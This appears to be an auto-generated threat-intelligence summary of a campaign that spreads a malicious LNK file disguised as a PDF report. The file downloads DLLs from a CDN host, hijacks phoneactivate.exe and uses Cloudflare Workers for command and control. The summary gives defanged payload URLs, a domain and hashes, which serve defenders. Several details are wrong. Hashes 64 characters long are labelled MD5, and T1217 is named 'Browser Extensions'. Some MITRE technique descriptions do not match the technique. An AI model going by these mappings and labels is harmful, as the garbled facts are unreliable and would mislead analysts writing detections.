On January 15, 2025, a malicious LNK file named DH-Report76.pdf.lnk, associated with a cyber campaign downloading payloads including a DLL used for hijacking legitimate processes, was discovered. The campaign appears to be targeting regions like Bangladesh, Pakistan, and China, utilizing deceptive means to distribute malicious content. Affected: Cybersecurity, Software, Cloud Services
Keypoints :
- A malicious LNK file named DH-Report76.pdf.lnk was uploaded to VirusTotal.
- The LNK file executes a PowerShell downloader sourced from army-mil.b-cdn[.]net.
- The downloader retrieves malicious DLLs: onelog.dll and sppc.dll.
- The legitimate phoneactivate.exe is hijacked and renamed to word.exe.
- A shortcut for persistent execution of the renamed executable is created in the Startup folder.
- The malware utilizes RC4 decryption to load a malicious payload named demon.x64.dll.
- Connections have been observed between this campaign and activity targeting Bangladesh, Pakistan, and China.
- Threat actors utilized Cloudflare Workers for Command and Control (C2) operations.
MITRE Techniques :
- T1203 – Exploitation for Client Execution: The LNK file exploits user interactions to execute the PowerShell script.
- T1071 – Application Layer Protocol: The downloader communicates via HTTP to retrieve malicious payloads.
- T1041 – Exfiltration Over Command and Control Channel: Uses C2 hosted on army-mil.b-cdn[.]net and others for payload delivery.
- T1217 – Browser Extensions: Involves adding malicious shortcuts that gain persistence through startup execution.
- T1005 – Data from Local System: The hijacked phoneactivate.exe is used as a vector for compromise.
Indicator of Compromise :
- [URL] http://army-mil.b-cdn[.]net/onelog.dll
- [URL] http://army-mil.b-cdn[.]net/sppc.dll
- [Domain] army-mil[.]zapto.org
- [Hash] MD5: 7498a07f903486473cce83fbf16b88009765af98326e1ebef4c48f103b874f65
- [Hash] MD5: 90f43a20a956b5d2e7b73cd3c2a6896a3af032414a297a23d0f07ef2f1016b17
Full Story: https://dmpdump.github.io/posts/Havoc/